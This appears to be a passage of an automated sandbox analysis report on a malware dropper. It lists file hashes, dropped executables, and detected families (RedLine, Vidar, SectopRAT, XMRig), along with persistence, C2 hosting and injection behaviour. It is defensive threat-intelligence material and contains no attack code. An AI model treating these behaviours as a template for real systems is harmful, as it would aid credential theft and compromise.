SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

memory/1912-131-0x0000000000A70000-0x0000000000BB2000-memory.dmp

memory/1784-130-0x0000000000840000-0x000000000092E000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

memory/660-140-0x0000000000950000-0x000000000097C000-memory.dmp

memory/2420-139-0x0000000000D00000-0x0000000000D08000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1744-153-0x0000000000270000-0x0000000000354000-memory.dmp

memory/3036-142-0x0000000002370000-0x0000000002454000-memory.dmp

memory/2692-138-0x000000013FC70000-0x000000013FC80000-memory.dmp

memory/660-159-0x0000000000140000-0x0000000000146000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2704-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2704-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/660-160-0x0000000000150000-0x0000000000170000-memory.dmp

memory/660-161-0x0000000000170000-0x0000000000176000-memory.dmp

memory/1912-162-0x0000000000270000-0x0000000000282000-memory.dmp

memory/2704-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-169-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-164-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-163-0x0000000000400000-0x0000000000A07000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBE81.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarBEA3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/564-225-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/2496-226-0x0000000000400000-0x0000000003346000-memory.dmp

memory/2692-229-0x00000000006C0000-0x00000000006CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services64.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/1716-233-0x000000013FDA0000-0x000000013FDB0000-memory.dmp

memory/1912-234-0x00000000087E0000-0x000000000886C000-memory.dmp

memory/1912-235-0x00000000007A0000-0x00000000007BE000-memory.dmp

memory/1360-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1360-242-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-240-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-238-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-236-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-246-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1360-250-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 799f3adcfbb6596256a7c7b1e0237480
SHA1 f570b98814687d730a409db056ec9afea9206758
SHA256 616a0cc53aa7ae199ac985d8cc545dba2d9ba15bd27c9baa32bb3c9876b875a0
SHA512 6a46f3b31ee1a37d7458432ee2d3fd630df7bd29f248bed38cb631b545e68b85742e587580902bc5daf2604d649c86a4d318500246361f48ed58a58f8443fad1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d2f3d7662156d79d501168854ba7abe6
SHA1 19671aabbbcc1ea2c1aec6c26cdab1d3e1e1a868
SHA256 4deb9de2a86ca348e461ef94c1687cd3a58ee78fac78d9c297affd64c4e17333
SHA512 8e7a61d1e5208ed1809143a19d2b0f4affa20b80117a09f195fcca2d903979041cb30212932fe80561c31d8ec8ee5d8aa177d2e69504e5a16418dae3f35f03b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 740af178c8807886f77382c6a0bcb167
SHA1 73b7d12c8f29b1e7d0ce420249039320fbedfe9f
SHA256 9bf11adf85c9a09c1d2aa3df19f0ee8bd3938b5d35cefdf5c436355d0ff9e39e
SHA512 882e6a4f75c021d66f5150f029b29eba2a5c6874f1091f1d8195095fdfb4387a11b9886c4212a1c48c25b1fa2139032ac39969d9d21222f5913e9030b3aa32bb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ce75ec67429098a8e34149a6b07f666c
SHA1 36029e0c1dad47814a923ca1906a57e983e33204
SHA256 70d7ab9afc1d778e828a956c644c0f0cb2a6aec3688b7038451678444e9d5c46
SHA512 58548a0bb7a4306a3653cade59d50c10e7d21346973e5e52457e7476ee40b57a4b1ab06666ad35df623b827af07ed66bb44d72d748709b28613ec063add8fafa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab7e75accdb0dddb4378e3ffef914713
SHA1 47934a23a6f5acac29155bfc5e0053c7ed964e68
SHA256 b13048a1140a44affb2f6f1652cccdba752417186f202528fee504f3d4284018
SHA512 5f1a778a0487ed88e69e97390b4f7e1404f9888e7f3501337ba33b08b5e2eb7154bd93a7bad31a02238df8eaf817b284cd852c79d39d1cc302f1fe7faf09b111

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 940ec3c43a409e9e8cb7707bb397bc63
SHA1 1711a242d8edd46a59b922ddbd2818d64567350d
SHA256 c9affb6d76681684f4e05f1e60392a5ded5fd75e0e7560c6c4eb9163f93e712a
SHA512 79057d32b31d73ea17c013f127941cc13f7161d0aca873722569cd8e56f9998821f06d520f7f54a3d54750c58b2959be42c31a2ffdce40f14b3268e676d7a24d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 bf2b8babd1517ca2f37d53866fa8eb64
SHA1 9f75708a8fac7789df3f18b27c0f99c039998eeb
SHA256 70d5b6161a5916f7b7fdfe5ffcff16cc69052acb58f12ac1607233e1a603372d
SHA512 1df4f9929c5979ac3a30545af04d948d57a497e90a41ed5a6df9d9f2636084d84dcc6fe7a01bd15d909e9a395b320dc3ccedea9ddfeac390744c167d88616e3a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c53f7d51a540b5cc7a64887cfc37b653
SHA1 471c41bf9d3df27ecf94ceabf2cb1dd261ba864f
SHA256 0f4aeba46469f81e5602c6aecd1f6bba9310cfdeba104347870efeea2dc22968
SHA512 a13a39d544ab355ca4b1d98d50f158c4c690bbbe558c1fde0a2d0974acaef0a70a196e66f495b032807a66c388f8bdae4e339c4fa41794fb5cb4565d9a525098

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81af0655573bae6402ad1202df2d4d15
SHA1 bbbf6ed4a18581a3cbf86e9f0324f85eb7c66c7d
SHA256 ba12cfe2d6c7749f881e571be5425aa6faf45531bcb40bd6b1be6abb435fccf2
SHA512 74698be3a88a79d54e41502c59721e308fc5bea5d3a79dd2eba9b76c233a5fc4a5cdbebedc56453f2c04b94b8ff8f2c73d0c765e28e17d40cb50ad1edae7af6a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ecdf5a0a8b9a0d21535d862bf8fa28c9
SHA1 e5fa1d176fe45064abefc4460c009944bc96b923
SHA256 d97bfd8a447c7767a04cf6d124acc891357e3d8e5cd474c789d4d585290fb7d9
SHA512 4d729d32d904e3762bad0100b7124ffc04c4fb9d8dd0e70403a92aa9c8a50ce80df1de8cabef12c381d2dfbe14230fe1eb4d2c52b58132182ddb799b4edc1e1b

memory/2336-770-0x000000013F930000-0x000000013F936000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ca60fb44436f4df836f36295ec6b0beb
SHA1 016ec87aeb336b40fa89ad7018bf41e55f2b7820
SHA256 18e053ef80d03961959dea5c77b3c9271f50ab36f89950e5361230844b226240
SHA512 dd774a2197b3c3fc82a894625478c69858102a90ce5f9a6b8db7a1b94b57598726e6416257854bbdc8e6542ea9d75d333323339e1fbfcc891f523c20efadfd80

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 89489a173dd5d2d0764e0512fe893dd5
SHA1 37ddd9ae26022a9f1efd2191d2e56be99eb95d22
SHA256 b1d2c97f15fceb8cbfcdb8941fb581c70b8d2de4a9e18c0d6e21ad6c35312490
SHA512 7545ab9f550730f9bc4b26beb351e0b536cf0f89f909b746ff3e0261c31a24ba195af44b165fb5ba53ad79e12f2050f186eb8a430e882a8c57ee9048cb6cc46f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c9fc01202c7060350a8e5f2b0fdb2013
SHA1 cd1e0160177ca3aabf9c0d1be662ce8127747e3f
SHA256 417a6d935979067a4e420e34794dab74607bbdfa51d18fd588af16111d452c90
SHA512 fe84238656104d70b1d07bd7f9ad7bc0c59a07977c85642c6b0b6d6e09685c6f66e3b8c100c34073ee69cbe11be05500d6544c1d9780568b4cae5ca6e5682b2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81cda058bc34d4a3150bd4016e51cea0
SHA1 f12bd32b289d88c5653aeca766a10c2bfcd2933d
SHA256 c51be7437622bcc0b39a7777b81436536dc84893395ec58d9df5d82b98bfd102
SHA512 96c1fae38c77b92807a8e5f4b4756758d1d48a9e983bbe9740a31bbf7859e4ffdbbd55f789d93eba9510bfa067ea6673943f58495e37f6ea6517f0b269d122b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e51e35d8d30ad12bf15259e5b38e895
SHA1 25e1a6406f507e4133a29b64a0fa1f6e0dedb920
SHA256 6d6478f9d9766ecaebd1c5f98d03bda0cb9e92c6d8ecd96fc3cb1f26b2c57c58
SHA512 6dbfc9b2b93b34d028ec2b3a586874ca92d91c339e279db721eeba522a57e3f52db0205b3b2d8caeea980eab79bdff870cc7a9dc753f185de3649dbc860af51e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bf6bd5253aef62752da181dc76f1ecca
SHA1 4e99aa95728b4cd95e5f60429354a820d5e00a68
SHA256 2a705696f830323c2b3f3c3850f22007a1efbc4cfbf06d317f389a67cc3240a0
SHA512 b1ef3981889f8d48d1770de13e1539280b5dc045098393444604515cfd8d92f9052b932985cb82b96bfb0c464fbdc1cff3816b04058495a83bdb9c79562a2997

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f32e3a5899bd1fb40609f2eb02d4f210
SHA1 87db7c11afb7397ff90b4b55f7782c49c62afe3a
SHA256 99a05549611ea85b6fcc6ec0cb8c9b830a637af8a72d171f3cd44918b0b84901
SHA512 6af21bce6ecad712a33880a708934f8a7e641ed985737261da485ccff9a518fdc4c666e95dfd2648bc6aefe4627b0d69198eb980cfcce4e2c9d4d872a9bc2e3a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 12b062be1b3533eb2dc1870127f05673
SHA1 5f6adb5b81db69628d155c965ffee5f02a4f7711
SHA256 0a7d7ca5fb5c829406e424041714b9f27020ffc9df551bb3107e79f343c1f8d5
SHA512 22522141c9f7ce2334915fd039d26594c5c68abd3a0f467397f41dba37588abcce7deff32113e2af284e337bb6fad5cc6d777bd05217af188cb77a11146c7413

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 337ec9f9e5b12c3cb6eff22708c4d311
SHA1 3f360caf2ea1b8f8b1d5894c58fd1f959e00857c
SHA256 15d34e62f7111345e95cfc965eaa0945eb97dec4e09c67c77de6820cf91add9e
SHA512 4b62e056f15070b7b573c572ca4e6e4cdbc3e937846f8e3f070a7b34e50a8c06c8089cde17de0490a245e04bd7c8496d4e44eaa94844bfe2d520474ac736e330

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 12:12

Reported

2024-12-06 12:15

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4948 set thread context of 2040 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3936 set thread context of 5796 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe N/A
